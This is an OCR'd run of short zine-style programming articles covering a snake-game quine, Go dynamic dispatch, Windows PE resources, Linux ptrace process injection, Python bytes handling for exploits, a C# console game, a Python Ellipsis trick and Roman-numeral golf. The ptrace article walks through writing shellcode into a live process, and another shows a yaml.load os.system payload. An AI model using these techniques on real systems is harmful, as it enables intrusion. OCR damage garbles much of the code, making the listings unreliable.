((char)s[it++]);addch(s[it++]);attroff(e) ;F( 
n(){srand(time(0) );while((e=s.find(10))>0) 
s.erase(e,1);s.replace(s.find(L"3d" ,L"("+s+L")");initscr();start_color() ;for( 
e=0;e<3;){init_pair(e, );}noecho();M();while(T())usleep(z<<7);end 
win();})x";I G(I x,I y){K 3&s[y*wtx]>>8;}I C(I x,I y,I c){(s[y*wtx]&=~z) |=c<<8;} 
I P(I d,I &x,I &y){F(d==1)x-=2; !d&&y++; d==2&&y--; F(d==3)x+=2;}1I M(){curs_set(0); 
I a=rand()%w/2*2,b=rand()%h;timeout(0);F(!G(a,b))C(a,b,2);else M();}I A(I x,I y) 
{K s[y*wtx]>>10;}I S(I d){(s[y*wtx]&=~3072) |=d<<10;}I T(){d=A(x,y);F(0<=(e=getch 
()) &&abs(m[e]-d) !=2)d=m[e];S(d) ¢P(d,x,y) +F(x<0| |y==h| | y<0| |x>w-2| |G(x,y)&1)K 0;8 
(d) ;F(G(x,y)&2)M();else{s[b*wta]&=~z;P(A(a,b),a,b);}C(x,y,1);move(0,0);for(I i=0 
;i<w*h; ){attron(e=z&s[i]);addch((char)s[it++]);addch(s[it++]) ;attroff(e);F(!(i%w) ) 
addch(10);}refresh();K 1;}I main(){srand(time(0));while((e=s.find(10))>0)s.erase 
(e,1);s.replace(s.find(L"%d"),2,L"("+st+L")");initscr();start_color();for(e=0;e<3 
;){init_pair(e,0,e+9);C(2,e++,1);}noecho();M();while(T())usleep(z<<7) ;endwin();} 


set(0);I a=rand()%w/2*2,b=rand()%h;t 

x,I y){K s[y*wtx]>>10;}I S(I d){(s[ 
e=getch())&&abs(m[e]-d) !=2)d=m[e];S( 
1)K 0;S(d);F(G(x,y)&2)M();else{s[b* 
r(I i=0;i<w*h;) {attron(e=z&s[i]);ad 
!(itw))addch(10);}refresh();K 1;}1I 


A quine is a program that takes no input and prints its 
own source as its only output. “Stepping outside 
itself’, e.g. by printing the contents of its own file, 
isn’t allowed; so it’s not a completely trivial problem! 


Quines are generally interesting to look at but almost 
completely useless otherwise. The standard trick used 
to write one is to represent a copy of the program’s 
own source as data within the program, usually in a 
string. It can then be formatted into itself and printed. 
This two-line Python quine is a neat example of this: 
s = 's = %Sr\nprint(s%%s) ' 

print(s%s) 

Quinesnake uses this string formatting to allow it to 
print its own source, but makes things more 
interesting by playing the classic game snake over 
the source (with wasd controls) after it’s printed! It’s 
still a quine, it just runs a game loop to accept 
keyboard control input, and highlights parts of the 
text as it continuously prints it to render the snake 
and the food, using the curses library. 


There are a number of techniques used to make 
quinesnake as small as possible. Perhaps the most 
interesting one is that it compiles itself. Making the 
source file executable and executing it invokes g++ 
on itself with a number of flags, includes and defines. 
This works because the first line of the program, / 
*bin/1ls>/dev/null.., is interpreted as a shell 
command, despite also being a valid C++ comment. 
The sed magic, borrowed mostly verbatim from 
stedolan’s minhttp project, parses the C++ comments 
(which contain the shell commands to compile the 
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program) out of the source file and executes them as 
a single shell command. Without this it’s really tricky 
to minify the program, because include and define 
statements must be on their own line. 


To keep track of the state of the game, and to make 
the source as confusing to read as possible (which is 
also important!), qguinesnake stores the game state in 
the spare bits of the source-as-data string used by the 
quine. The type of this string is std::wstring, a 
string class for storing wide (>=16 bit, or wchar_t) 
characters. Since guinesnake only uses it to store 8- 
bit ASCII characters, that leaves the rest spare to 
store the state of the character in the output (empty, 
snake, or food), and the direction of the snake pixel 
that proceeds this one (up, down, left or right), if it’s 
part of the snake. Every other wchar_t in the string 
contains these 4 bits of game state in the higher order 
bits above the regular character, so they’re removed 
by casting the wchar_t down to char when printing. 


Finally, string formatting in these programs can be a 
huge pain when special characters need to be escaped 
(e.g. quotes, newlines) so that they appear as special 
characters in the source, but escaped characters in the 
source-as-data string. To not have to worry about 
this, quinesnake uses a raw wide string for the data, 
which does no special character escaping. The little 
substitution that’s required is done manually instead, 
by manually finding a %d substitution token in the 
string to replace it with the string itself. 


Hopefully this inspires you to write your next useless 
and overcomplicated program! — Conor Taylor 
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Emulating Virtual Functions in Go 


Go doesn’t support the inheritance-based OOP 
model known from languages like Java or C++, 
composition is favored instead. 


We are going to abuse (really, don’t do it in your 
code) Go's interfaces and embedding to achieve 
dynamic dispatch (think virtual functions in C++). 


Let’s dive in! 


First, we define an interface type describing all the 
virtual methods that are going to be defined. 
type VehicleVirtualParts interface { 


VColor() (int, int, int) 
} 


type Vehicle interface { 
Speed() int 
Color() (int, int, int) 
VehicleVirtualParts 


VehicleBase is where most of the magic happens. 


type VehicleBase struct { 
virtual VehicleVirtualParts 


Speed() calls the “virtual” function Color(), so we 
expect that the return value will be different for types 
that implement VColor() differently. 
func (vb *VehicleBase) Speed() int { 
r, g, b := vb.Color() 


if r == 255 8& g == 0 && b == 0 { 
return 9001 // strictly over 9000 


return 100 


} 


SetVTable() is going to be called in “constructors” of 
types that inherit from VehicleBase. 
VehicleBase. virtual field is an interface type, so each 
time you call its method, the dynamic type’s method is 
going to be invoked (aka dynamic dispatch). 


func (vb *VehicleBase) SetVTable(v VehicleVirtualParts) { 
vb. virtual = v 


The Color() function makes it opaque for the rest of 
the code that the implementation uses dynamic 
dispatch. 


func (vb *VehicleBase) Color() (int, int, int) { 
return vb. virtual. VColor() 


We are using NewX() for every defined type. It is not 
really needed for VehicleBase, but we're doing it to for 
the sake of consistency. Derived types are going to do 
something meaningful there. 


func NewVehicleBase() *VehicleBase { 
return &VehicleBase{} 
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All types below use embedding to emulate inheritance. 


type Car struct { 
*VehicleBase 


First, you need to construct your base type, and then 
call SetVTable(). See NewCar() and NewMotorcycle(). 


func NewCar() Car { 
c := Car{NewVehicleBase()} 
c.SetVTable(c) 
return c 


} 


func (c Car) VColor() (int, int, int) { 
return @, 255, ® // cars are green 


} 


type Motorcycle struct { 
*VehicleBase 


} 


func NewMotorcycle() Motorcycle { 
m := Motorcycle{NewVehicleBase()} 
m.SetVTable(m) 
return m 


} 


func (m Motorcycle) VColor() (int, int, int) { 
return 255, 0, @ // motorcycles are red 


} 
RedCar overrides Car's VColor() implementation. 


type RedCar struct { 
Car 


} 


func NewRedCar() RedCar { 
r := RedCar{NewCar()} 
r.SetVTable(r) 
return r 


} 


func (r RedCar) VColor() (int, int, int) { 
return 255, 0, @ // red cars are red 


} 
Running the program below: 


func main() { 
m NewMotorcycle() 
c NewCar() 
r NewRedCar() 


printSpeed("Motorcycle", m) 
printSpeed("Car", c) 
printSpeed("RedCar", r) 

3 


func printSpeed(name string, v Vehicle) { 
fmt.Printf("%s speed: %v\n", name, v.Speed()) 
} 


will output: 


Motorcycle speed: 9001 
Car speed: 100 
RedCar speed: 9001 


As desired, the value of Speed() changes as it depends 
on the “virtual dispatch” of the Color() function. 


— kele 
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Intro to Embedded Resources in Windows Apps 


Intro to Embedded Resources in Windows Apps 
by Jon ‘Doc’ Andrew 


No matter what operating system you’re 
working with, some type of “object” format 
will be used to store binary “runnable” code 
and/or data that can be executed or Linked 
with other objects to produce an executable. 
Linux uses ELF (Executable and Linking 
Format), and Windows uses PE _ (Portable 
Executable). Generally, they perform the 
exact same function, and both contain 
“sections” Like .text (for executable code), 
«bss (uninitialized data), -data (for 
initialized data), and many others. In Linux, 
an application binary is an ELF object file 
with a flag (ET_EXEC) set. In Windows, an 
application binary is a PE object file with 
a flag (IMAGE_FILE_EXECUTABLE_IMAGE) set. 


So far, so good, right? If we dig a little 
deeper into the PE format used in Windows, 
there are some optional sections that are not 
present in ELF. One of these is a .rsrc 
(resource) section. Typical applications will 
have the application icon and an “application 
manifest” (XML file describing the app) 
bundled into the executable within a .rsrc 
section. The .rsrc section can even behave as 
a complete directory structure within the PE 
file! Anything can be a resource, even driver 
files and 34 party DLLs! 


The advantage to using this technique over 
those described later in this article is the 
availability of Win32 API calls for easily 
accessing these resources at runtime and 
ability to re-link new resources in without 
recompilation. 


The SysInternals “procmon” app uses this 
technique to extract a kernel driver (.sys - 
which is also a PE file) used for listening 


to OS events. In fact, in an .exe you can 
embed a .dll as a resource, which itself 
contains a .sys file! In this sense, a PE 


file can act a lot like a .zip file, which 
can itself contain other .zip files. Instead 
of having to run an installer or ship a .zip 
file, a single .exe can be delivered which 
extracts the resources it needs at runtime. 


Here’s a brief example of embedding a small 
text file into an executable. This should be 
run in a Visual Studio native tools command 
prompt. I used D (www.dlang.org) for the 
executable, but C/C++ would be very similar. 
Note that 64-bit code must be used here so 
Llink.exe will work with our D .obj file. 


Creating a resource, resource definition and 
compiling into a .res file: 

> echo PAGEDOUT! > myres.txt 

> echo FOO RCDATA "myres.txt" > myres.rc 

> rc.exe myres.rc 
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Source for loading the resource (hello.d): 
(imports and function omitted for brevity) 


auto res = FindResource(null, "FOO", RT_RCDATA); 
char* ptr = cast(char*)LoadResource(null, res); 
auto size = SizeofResource(null, res); 
write(ptr[0 .. size]); 


Compiling, Linking and running the code: 
> dmd.exe -m64 -c hello.d 
> link.exe hello.obj myres.res \ 
/LIBPATH:C: \D\dmd2\windows\1lib64 \ 
legacy_stdio_definitions.lib 
> .\hello.exe 
PAGEDOUT ! 


Note that there are other ways to embed non- 
executable data into an .exe. For instance, 
self-extracting 7-Zip files can be created by 
just concatenating a .sfx (the executable 
part) with a small config file and the 


compressed file archive itself using a 
command like this: 

> copy /b a.sfx + b.conf + c.7z d.exe 
+---------- +------------- +--------------- + 

| PE .exe | Config text |Compressed file] 
+---------- +------------- +--------------- + 


The PE format is ignorant about what’s at the 
end of the PE image itself. If you try to 
analyze the self-extracting executable with 
a utility like dumpbin.exe, you’1l see that 
a relatively small portion of the overall 
file is represented as a PE. At runtime, the 
self-extracting code reads its own file to 
get the config and compressed data _ for 
extraction. 


Finally, you can always compile static data 
into the object file and Link that into the 
binary. One way to do this is opening the 
file to embed in a hex editor like HxD, and 
exporting it as a .c file. Instead of rc.exe, 
compile this with your regular C compiler and 
link it with the rest of the app as usual. 


Note that unlike PE resources, using static 
data in an object file is a cross-platform 
solution. GNU binutils’ or mingw’s “objcopy” 
or “ld” can also take a regular file and save 
it as an object file which exports a symbol 
for your embedded data. That symbol can be 
referenced in your app as a static variable. 
You can use this variable, write the memory 
to disk, etc. Of course, you could encrypt, 
compress or obfuscate the data prior to 
inclusion in your application. 


Unknown apps with large read-only data 
sections or .data sections that appear to 
contain executable code should be suspected 
for holding some sort of payload using this 
technique! 


github.com/docandrew 
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- Watch ace hackers solve pwnable challenges in a four player race live on YouTube 
- Listen to commentary and insightful analysis to learn the best exploitation tricks 


- Think you are up to the task? Solve the community challenge and participate yourself! 


Information and schedule: https://pwny,racing 


me = Community Advertisement _ en Advertisement 


How do I start with reverse engineering? 
Starting off with reverse engineering is challenging, to say the least. 
There are numerous blogs freely available online which show certain 
techniques, but nearly all of them use proprietary tools. For this reason, 
I decided to create my own Binary Analysis Course’ where the focus is on 
the how and why, in combination with free tooling. Starting from June 
2018, I published an array of articles, starting off at the very beginning 
and ending at known malware families such as Emotet or Magecart. 


The course is, and will, remain free for anyone to use in the future. If 
you have feedback or questions about the course or about reverse 
engineering in general, feel free to reach out to me on @LibraAnalysis’ on 
Twitter! 


1 https://maxkersten.nl/binary-analysis-course/ 


2 https://twitter.com/LibraAnalysis 


Introduction to ptrace 
- injecting code into a 
running process 


Injecting code into a running program can have 
many use cases, from widely defined malware, 
runtime patches of the process that cannot be 
stopped, up to the topic of debuggers and reverse 
engineering frameworks. They all need access to 
the state of the execution of another process, with 
ability to read/write values from memory or 
registers. 


On Linux such ability to debug another process is 
provided by a system call named ptrace. It allows 
any program (called “tracer”) to observe and 
modify state of another process attached to it 
(“tracee”) via number of requests. 

#include <sys/ptrace.h> 

long ptrace(enum __ptrace_request request, 
pid_t pid, void *addr, void *data); 

One thing to note is that although arguments to 
ptrace are interpreted according to the prototype, 
glibc currently declares ptrace as a variadic 
function with only the request argument fixed. It is 
still recommended to use all four arguments, 
setting unused to OL or (void *) @. 


In order to start debugging an already running 
program, we have to send a PTRACE_ATTACH 
request to a target process identified by its PID 
(Process IDentifier) value. After that the tracee will 
receive SIGSTOP signal, pausing the execution in 
its current state, for which we have to wait in 
tracer program. 

ptrace(PTRACE_ATTACH, pid, NULL, NULL); 
wait(NULL) ; 

At this moment, we’re ready to mess around with 
the state of the process we’re attached to. We can 
get values of registers into a structure called 
user_regs_struct defined in <sys/user .h> 
header. 

struct user_regs_struct old_regs; 
ptrace(PTRACE_GETREGS, pid, NULL, 
&old_regs); 

Having that information and an ability to set the 
values of registers in a process, we can change the 
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Introduction to ptrace - injecting code into a running process 


flow of execution by modifying the RIP (EIP in x86, 
RIP on x86-64 as used in this example) register. 


But before doing anything, let’s think about where 
we would place our code in memory. One way to 
do it would be to parse /proc/PID/maps file and 
look for sections containing permissions to 
execute. 

~> cat /proc/12862/maps 
556e40ee8008-556e40ee9800 r--p 88000000 
08:01 918642 /home/w3ndige/sample_process 


556e40ee9008-556e40eea800 r-xp 80001000 
08:01 918642 /home/w3ndige/sample_process 


In this example, second section from the truncated 
maps output would be a way to go, we have 
matching permissions (“r-xp”) and an address 
range where we would be able to write our code 
(556e40ee9000 -556e48eea000). Even though 
writing a parser for maps file is really easy, you can 
also use different techniques - overwriting code 
from address stored in RIP is another trivial 
technique. On the other hand, we can try to find a 
code cave in a process memory and inject code in 
it. 


Once we have a region in memory that will be 
suitable for injection, we can use another ptrace 
request called PTRACE_POKEDATA to write a word 
(32 or 64 bits) of data (here represented by 
uint64_t array ) into a specified address (long 
int). Similarly to that we can read from memory 
with PTRACE_PEEKDATA request. 


ptrace(PTRACE_POKEDATA, pid, addr + i * 8, 
shellcode[i]); 


So, we’ve managed to inject code into the memory 
of a process within some region. Now we have to 
come back to previously stored registers, change 
the value of RIP to the address where we placed 
our code and set registers to the process. Finally, 
after that we can continue the execution of tracee. 
old_regs.rip = addr; 
ptrace(PTRACE_SETREGS, pid, NULL, 
&old_regs); 

ptrace(PTRACE_CONT, pid, NULL, NULL); 
Remember that while tracing multithreaded 
applications, tracee is always only a single thread, 
meaning that after attaching to the process we’ll 
be actually attaching to the initial thread. Others 
will continue execution just as before. 


PoC: github.com/W3ndige/linux-process-injection 
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Strings & bytes in Python 3 


Strings & bytes in Python 3 


You are building an exploit and, not being a barbarian, 
have switched from Python 2 to 3. One part of your ex- 
ploit involves leaking an important address by dumping 
a chunk of memory. This chunk of memory contains a 
lot of random data but somewhere in the middle you 
know that there is a string "Har: ”! followed by the 
4 bytes representing the little endian encoding on the 
address you are looking for. You copy some old Python 
2 code that you have used for a similar situation: 
def extract_leaked_pointer (leak): 

marker = 'Har: ' 

start = leak.find(marker) 

leak_start = start + len(marker) 

leak_data = leak[leak_start:leak_start+4] 

return struct.unpack('<I', leak_data) [0] 


Sadly, when running this, you get the following error: 
TypeError: argument should be integer 
or bytes-like object, not 'str' 


To solve this, you try to decode the leaked bytes into 
a string by adding this line to the code: 
leak = leak.decode('utf-8') 


Unfortunately, this doesn’t work either and you are left 
staring at another error message: 


UnicodeDecodeError: 'utf-8' codec can't 
decode bytes in position 0-1: invalid 
continuation byte 


In anger your desire to develop as hacker, you turn to 
Puitterand complain_abeuthew Python 3-sueks this 
article to understand how to reason about Python 3, 
strings, character encodings and arbitrary bytes. 

The problem is that you are trying to interpret an ar- 
bitrary sequence of bytes as UTF-8 encoded data. This 
is the equivalent of trying to push a square peg through 
a round hole. It won’t work. The following diagram 
shows what you are trying to do and where it goes 
wrong. 


[ »..-\x48\xC3\xAd\x72: \xBE\xBA\xFE\xCA...” | 


C) string 
(e) bytes 
@ int 


UTF-8 decode 
Medals (aN 
Find marker | 
Extract bytes 
”\xBE\xBA\xFE\xCA” 


Error 


Little endian | 
[ 0xCAFEBABE | 


1Swedish for ” here” 
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Let’s remind ourselves about character encodings. The 

goal is to represent a character such as ” A”. Comput- 
ers work with numbers (more precisely bits), not char- 
acters, so we translate the character into a number. In 
the ASCII encoding, this is the number 65. We call this 
the codepoint. This value is then encoded using a single 
byte 0x41. This is simple in ASCII because there is a 
one to one to one mapping between characters, code- 
points and bytes and can this be implicitly done with- 
out thinking about it. Python strings are not limited 
to ASCII but can represent the full Unicode range. If 
we use the UTF-8 encoding and take the character a 
we instead get: 


Character | Codepoint | Bytes Encoding 
A 65 0x41 ASCII 
A 65 0x41 UTF-8 
a 228 OxC3 OxA4 | UTF-8 


Specifically, one character maps to a codepoint which 
is encoded with more than one byte and not every se- 
quence of bytes represents a valid character. This is 
what causes the problem. To solve this, instead of try- 
ing to convert the “haystack” bytes into a string and 
search for a substring, you convert the ”needle” marker 
into a sequence of UTF-8 bytes and search for that 
sequence of bytes in the haystack. When it is found, 
you can extract bytes relative to that offset and process 
then accordingly, in this case, convert them to a 32-bit 
number. This slightly modified diagram describes this 


approach. 
() string 


@ bytes 


Find marker | @ int 


7 
[ 7--\xt8\xC3\xAa\xr2: \xBE\xBA\xFE\xCA...” 


UTF-8 encode 
@ \x48\xC03\xA4\x72” | 


Extract bytes 
”\xBE\xBA\xFE\xCA” 


Little endian | 
[ oxCAFEBABE | 
Which, translated to Python 3 code looks like this: 


def extract_leaked_pointer_python3 (leak) : 
marker = 'Har: '.encode('utf-8') 
start = leak.find(marker) 
leak_start = start + len(marker) 
leak_data = leak[leak_start:leak_start+4] 
return struct.unpack('<I', leak_data) [0] 


In short, don’t try to convert bytes that don’t represent 

text, into text. Instead convert the text into bytes, use 
it to extract the relevant bytes and then process them 
accordingly. Now your exploit works in Python 3 and 
you can leave another legacy language behind. 


https://zeta-two.com 
https://twitter.com/ZetaTwo 
https://youtube.com/ZetaTwo 


CP850 cmd game in C# .NET 


Meemki, a somewhat bored security researcher who 
accidentally exploits and therefore shuts down a part of 
the stable universe computer, is the protagonist in an 
urban noir-style EASCII game. He learned a lot about the 
infrastructure he discovered by using an unknown 
proprietary protocol. Now he knows the universe will de- 
stabilize reaching an undefined state in a couple of days. 
He needs to get physical access to the universe computing 
infrastructure which is held by the SAOTU (Secret Alliance 
of the Universe). On his way he needs to exploit all kinds 
of security systems, physical as well as computer based 
and gets himself in situations he was not prepared 
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When starting with this Weemki project, a few constraints 
were made for the sake of fun, style and challenge: run in 
cmd; system libs only; graphics with CP850 chars. | used 
C# .NET because it is fast to get to the point and | am 
quite confident with it. 

In this article, some tricks are shown which solve common 
problems with game development for cmd to get you 
started. 

First of all, we want a borderless fullscreen cmd. This can 
be achieved by utilizing WinAPI’s ConsoleApi3.h available 
through the kernel32.dll. In particular we are going to use 
the SetConsoleDisplayMode function which can be 
accessed in C# as follows: 


[DllImport ("kernel32.d11")] 

public static extern bool 
SetConsoleDisplayMode(IntPtr hConsoleOutput, 
uint dwFlags, 
out _COORD 1pNewScreenBufferDimensions) ; 


In order to invoke it, we need the _COORD struct and a 
handle to the console screen buffer: 


[StructLayout (LayoutKind.Sequential) ] 
public struct _COORD 


{ 
public short X; 
public short Y; 
public _COORD(short x, short y) 
{X = x3 Y = y3} 
}5 


[DllImport ("kerne132.d11")] 
public static extern IntPtr 
GetStdHandle(int nStdHand1le) ; 


Calling the functions on startup with -11 for the standard 
output handle and 1 for console fullscreen mode: 


github.com/OxRUFF 


CP850 cmd game in C# .NET 


_COORD coord = new _COORD(); 
SetConsoleDisplayMode( 
GetStdHandle(-11), 1, out xy); 


..and you are done! Fullscreen borderless cmd. 

Based on the keywords Dillmport and the imported 
function’s names, you are able to dig into the topic(s) 
deeper or just use the code to set up a fullscreen cmd to 
get an immersive experience. 

Another tricky part is the keyboard input: Open a notepad 
in Windows and press a letter on your keyboard for some 
time. You will notice a delay before the letter is 
repeatedly printed and probably a delay after releasing 
the key. This behavior is called character repeat hold time 
and delay. It is a system setting and also occurs when 
using the standard Console.ReadKey in C#. The delay is 
very impractical for games, so we need another way to 
handle keyboard input. Luckily there is a way using 
WinAPI’s winuser.h through user32.dll. The GetKeyState 
function allows us to check if a given key is down and can 
be used in C# as follows: 


[DllImport("user32.d11")] 
public static extern short GetKeyState( 
int nVirtKey); 


The returned short’s high order bit will be 1 if the nVirtKey 
is down. All that is left to do is getting the hex code for the 
key we want to check (http://msdn.microsoft.com/en- 
us/library/dd375731%28v=VS.85%29.aspx), pass it to the 


function and compare with a proper bitmask: 
if ((GetKeyState(0x27) & @x8000) != @) 


0x27 is the right-arrow on the keyboard and the if- 
statement is true when the key is down. This way 
keystrokes feel very direct. If this solution is still too slow 
for you, have a look at the GetAsyncKeyState function 
within winuser.h which reflects the interrupt-level state of 
the keys. 

Last but not least, if you want to redraw the content of 
the cmd, it is worth to consider double buffering to avoid 
flickering/stuttering which is likely to appear when 
redrawing the whole screen for every frame. For Meemki 
a memory buffer is used and only the changes between 
two frames are redrawn to the screen by using 
Console.SetCursorPosition and Console.Write. 

Meemki is currently in a very early stage but if you are 


interested, check it out here: github.com/OxRUFF/Meemki 


DISCLAIMER: The described methods may not work on all 
devices as they might depend on certain drivers. 


Christian Bohnhoff 
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from cpython_exploit_ellipsis import * 


from cpython_exploit_ellipsis import * 


Have you ever tried using Ellipsis in Python? No? 
Then do this in your Python interpreter: 


POP aes 
Ellipsis 


Boom! If you don’t know what Ellipsis is for,this arti- 
cle won’t explain it'. We will play with Ellipsis a bit more 
instead. Let’s begin with some magic: 


Since those are real modules, we can also call their func- 
tions. Let’s see this on an example that uses the unsafe 
yaml.1load function that allows us to launch arbitrary code 
via loading proper yaml payload: 


>>> ....yaml.load( 
"!tpython/object/apply:os.system " 
"['echo yaml.load is insecure by design 

yaml.load is insecure by design :( 

0 


Cl) 


>>> from cpython_exploit_ellipsis import * 


>>> ..., isinstance(..., Ellipsis.__class__) 
(Ellipsis, True) 


The Ellipsis seems to be the same but it has two addi- 
tional features. First of all, we don’t have to do any explicit 
import statements now. We can do inline imports instead, 
via Ellipsis object’s _.getattr__: 


>>> ....antigravity 
<module ‘antigravity' from 
+ '/usr/lib/python3.X/antigravity.py'> 


The second feature the magic gave us is the ability to 
get libc functions via _.getitem__. This might be handy 
if you want to play with things like printf, scanf or other 
not-so-obvious functions and you are too sophisticated to put 
yourself in a write-compile-launch loop. Example below. 


>>> ...['system'] 

<_FuncPtr object at 0x7f35603aa4f8> 

>>> ...['rand'] () 

51242132 

>>> ...['printf'](b'%p Z%p ~p Z%p Z%p Z~p\n', id(...)) 
Ox9bb100 (nil) Ox1be1498 0x555390 0x555421 Oxa 

47 


That’s all. So how is it done? See for yourself by solving the puzzle below and studying the exploit code! Enjoy o/ 


33 Od Od Oa 56 27 eb 5c b9 
40 00 00 00 73 76 00 00 
5a 01 78 34 65 02 65 
18 5a 05 65 06 65 O1 
65 01 83 O01 65 09 65 
Oe 5f Of 64 08 5a 10 
00 00 00 00 00 00 00 


73 5f 5£ 72 08 00 00 
11 5a 06 63 74 79 70 
72 0a 00 00 00 da 07 
5a 06 73 69 7a 65 6f 
08 63 5f 75 69 6e 74 
5f 61 75 74 68 6f 72 5f 
da 08 3c 6d 6f 64 75 6c 65 


00 00 00 00 00 07 00 00 00 
64 03 84 00 64 03 83 02 
68 03 18 00 44 00 5d 
00 71 30 57 00 65 08 
65 Od 83 01 83 02 6a 
2a 63 00 00 00 00 00 
5a 01 64 00 5a 02 64 


f 61 73 
65 63 74 33 64 4e 29 
69 72 72 12 00 00 00 
64 da 04 63 61 73 74 
4f 49 4e 54 45 52 5a 
61 6c 75 65 da Oa 5f 
00 00 00 72 07 00 00 00 
02 Oe 08 te 01 18 02 22 O1 


TYou might want to check out https://stackoverflow.com/questions/772124/what-does-the-python-ellipsis-object-do 
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https://disconnect3d.pl/ 
https://github.com/disconnect3d 
https://twitter.com/disconnect3d_pl 


A PARSER-—GENERATOR IN 10016 LINES OF C++ 


32 


Please excuse the longish intro —I promise this is going somewhere! 


In the past, my day job consisted of creating and maintaining 
a Material Flow Control System (often called MFCS,,) for 
warehouses and production plants. This necessitated 
connecting to various PLCs controlling the mechanical parts 
— from huge cranes, through conveyor belts, and all the way 


down to LED systems telling humans what to do. 


All those systems had one particular thing in common: they 
all defined similar, but different text-based protocols to be 
used to communicate with them over TCP. In a simplified 
example, that’s how a message to a crane could be defined: 


Field name Field type Comment 
Begin ALPHA[1] Character [ 
Message Type ALPHA[3] “MOV” for move 
X To NUM{[3] 
Y To NUM[3] 
End ALPHA[1] Character ] 


move crane 


Have you ever needed to implement a third-party plaintext 
protocol? It’s as simple as it’s boring. And Deity forbid if the 
documentation changes after initial implementation. You'll 
waste so much time! At least that’s what I told my boss when 
I started creating a templated declarative parser. 


To be fair, I was fairly accurate. I inherited code that used 
std::map<std::string, std::string>, and I wager 
that I wasted multiple days hunting all the typos in those 


strings. 


Since C++ is a fairly strongly-typed language, there is no 
need for that — we should be able to leverage the type system 
to ensure that both our keys and values are correct. Let's 
discuss the API: 


* — keys (field names) should be verified at compilation 
time — none of these pesky typos can pass here, 


* values need to be of correct type, not the all- 
catching std::string, 


* the code should be as close as possible to the 
documentation. Ideally, it’d be the documentation. 


For example, we could want our MOV telegram to be 
defined as follows: 


using mov = message< 
element<struct begin, char _constant<'['>>, 
element<struct message type, text<3>>, 
element<struct x to, number<3>>, 
element<struct y to, number<3>>, 
element<struct end, char _constant<']'>> 


dev.krzaq.cc 
https://twitter.com/KrzaQ2 


A parser-generator in 100 lines of C++ 


The usage should be also simple. For receiving: 


auto data = socket.read(); 
mov m = mov::parse (data); 
log << m.value<x_to>() << m.value<y to>(); 


And for sending: 


mov m; 
m.value<message type>() = "MOV"; 
m.value<x_to>() = 13; 
m.value<y to>() = 37; 


socket.send(m.to_string()); 


This approach is Good Enough™. We have type safety, and 
we can even extend it to use custom types. For example, the 
above will write the following to the socket (note the 
padding: zeros for numbers, text would use spaces): 
[MOV013037] 

Moving on, the internal implementation is surprisingly 
simple. The main class template accepts a list of key-type 
pairs as variadic pack. It uses keys only to map them to 
values. The type has a bit more to do — each type is expected 
to know its length, and how to serialize and deserialize itself 


(or signal an error). 


template<typenam Elements> 
struct message 


{ 


static message parse(string view buf); 
void write(char* buf, 
string to_string() 
template<typename Key> 

constexpr autoé value(); 


size t size) const; 


const; 


private: 
tuple<typename d:: 
Elements>::type...> data; 


lement_value_type< 


he 


Class message definition — shortened and modified to fit here 


template<size t Length> 
struct number 


{ 


static constexpr size t length = Length; 

using value_type = 

d::type to_hold number<Length>; 

static void write (value_type const& val, 
char* buf); 

static value_type parse(string view buf); 


he 

Class number definition — shortened and modified to fit here 
As of writing this article, the whole proto.hpp has 248 lines, 
and I haven’t performed any line-saving optimizations on 
the file. 


The code may be accessed at the following address: 


https://github.com/KrzaQ/protocol parser_generator. 
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Rome golfing 


Rome golfing 


How do you convert for example 42 to base 16? 


42/16|2 ri10 A 


2/16/0 r2 2 42 (10) = 2A (16) 


Can we do the same to convert arabic numbers to 
roman? 

In base 10 system we have units, tens, hundreds and 
so on... Each as ten times previous one. But that is not 
the case with roman numerals: 


Symbol I V X L ¢ D M 
Value 1 5 10 50 100 500 1000 


V is five times I, but X is two times V. Then L is five 
times X and C two times L. There is pattern alternating 
5 and 2. Let’s try to convert 42: 


r2 II 
r oO 
r 4 XXXX / XL 

First divide 42 by 5 which gives 8 and remainder 2. 
So there are two symbols I. 

Next divide 8 by 2 (remember to alternate) to get 4 
and remainder 0, so no Vs there. 

Lastly dividing 4 by 5 gives terminating 0 and 
remainder 4. That gives four symbols X. 

42 is XXXXII using additive notation, but for four 
symbols in a row we’re using subtractive notation. Thus 
we need to reach for next symbol and precede it with one 
current symbol giving in result XLII. 

If we look at various numbers there are two variants 
requiring subtractive notation. One is like 4 subtracting 
from next symbol (IV) and other like 9 subtracting from 
symbol two places further (IX). Let’s look at 19: 


19 divided by 5 is 3 and remainder 4. Four symbols we 
want to write in subtractive notation and this is second 
variant so we reach to X and subtract I from it. 

Then 3 divided by 2 gives 1 with remainder 1. That 
gives one symbol V. 

Final step is to divide 1 by 2 to get 0 and remainder 
1. Last symbol is X. 

XVIX is not the expected result. Problem is that IX 
in additive notation is VIIII so we should have had one 
less Vs in the result. Let’s try again. 


| IX 1 | 3-1 
| | 
| | 
And that gave XIX :) Alternatively we can subtract 
one from the division result before the next step. 


Taeril 


CC BY 4.0 


At the beginning of year 2003 on usenet newsgroup 
pl.comp.lang.javascript a small code golf challenge has 
been posted. Ultimately what they produced is mind 
boggling: 


function rome(N,s,b,a,o){ 
for (s=b='',a=5;N;bt+,a7=7) 
for (o=N%a,N=N/a*0;0--;) 
s='IVXLCDM' . charAt (0>2?7b+N- (N&=~"1)+(0=1) :b)+s; 
return s 


} 


Function rome takes one argument N which is the 
number to convert. Other arguments are basically just 
local variable declarations without using var keyword. 
Global variables wouldn’t be elegant. 

Resulting roman numeral is assembled in s. 

Variable b is a pointer to the currently processed 
symbol. It is initialized to an empty string which treated 
as a number would be converted to value 0. 

Variable a is used to alternate between 2 and 5. 

Remainder — number of symbols of given type — is 
saved in variable o. 


Outer loop initializes variables and goes as long as N 
is not zero. After each iteration it moves to the next 
symbol (b++) and switches between 2 and 5 using neat 
xor bit twiddling trick. 


Initialization part of inner loop divides N by a (2 or 
5) and sets o to remainder and N to quotient. Because 
JavaScript has only floats N/a*0 trick acts like int (N/a) 
discarding fractional part. 

Loop goes as long as o is greater than zero. 

Call to charAt method on a string chooses next 
symbol which is concatenated with s. 

If o is not greater than 2 index is simply current 
symbol being processed, i.e. value of b. 

Otherwise subtractive case is handled. 

Index is the current position (b) plus one (o=1) plus 
another one if N is an odd number. 

Middle part of that — N-(N&=~1) — uses bit trick to 
set least significant bit of N to 0 effectively subtracting 
one from odd numbers. Even values stay unchanged so 
whole expression is 0 for odd numbers and 1 otherwise. 


return s — I have absolutely no idea what comment 
it warrants ;) 


Happy golfing 
Taeril 


Usenet discussion is archived at: https://groups.google.com/d/ 
topic/pl.comp.lang. javascript/uDJED8XeaDg 

Unfortunately it’s in Polish language. 

Great respect to Vax who was the main driving force of this 
